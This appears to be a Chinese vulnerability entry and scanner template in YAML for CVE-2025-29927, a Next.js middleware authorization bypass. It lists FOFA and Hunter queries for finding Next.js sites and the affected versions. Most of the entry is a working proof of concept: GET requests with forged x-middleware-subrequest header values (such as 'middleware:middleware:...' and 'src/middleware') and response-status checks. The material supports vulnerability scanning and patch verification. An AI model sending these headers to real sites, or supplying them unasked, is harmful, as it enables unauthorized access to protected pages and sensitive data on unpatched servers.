漏洞描述
该漏洞源于Next.js使用中间件进行身份验证和授权的过程存在漏洞,该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
fofa: app="NEXT.JS"
hunter: app.name="Next.js"
CVE-2025-29927: Next.js Middleware鉴权绕过漏洞
PoC代码[已公开]
id: CVE-2025-29927
info:
name: Next.js Middleware鉴权绕过漏洞
author: Y3y1ng
severity: critical
verified: true
description: |-
该漏洞源于Next.js使用中间件进行身份验证和授权的过程存在漏洞,该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
fofa: app="NEXT.JS"
hunter: app.name="Next.js"
effected: |-
15.* <= Next.js <15.2.3
14.* <= Next.js <14.2.25
11.1.4 <= Next.js <= 13.5.6
references:
- https://mp.weixin.qq.com/s/5R6WlX8J82braaMkAmisww
- https://github.com/vulhub/vulhub/blob/fd7a2b9f15f101089065221d8752000b5e34eaaf/next.js/CVE-2025-29927/README.zh-cn.md
- https://github.com/Threekiii/Awesome-POC/blob/17ecc4765fa9a26052250bfe0d9db6ff7d354e97/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/Next.js%20%E4%B8%AD%E9%97%B4%E4%BB%B6%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2025-29927.md
tags: cve,cve2025,nextjs,unauthorized
created: 2025/04/07
rules:
r0:
request:
method: GET
path: /
expression: response.status == 307 || response.status == 308
r1:
request:
method: GET
path: /
headers:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
expression: response.status == 200
r2:
request:
method: GET
path: /
headers:
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
expression: response.status == 200
r3:
request:
method: GET
path: /
headers:
x-middleware-subrequest: src/middleware
expression: response.status == 200
r4:
request:
method: GET
path: /
headers:
x-middleware-subrequest: middleware
expression: response.status == 200
r5:
request:
method: GET
path: /
headers:
x-middleware-subrequest: pages/_middleware
expression: response.status == 200
expression: r0() && (r1() || r2() || r3() || r4() || r5())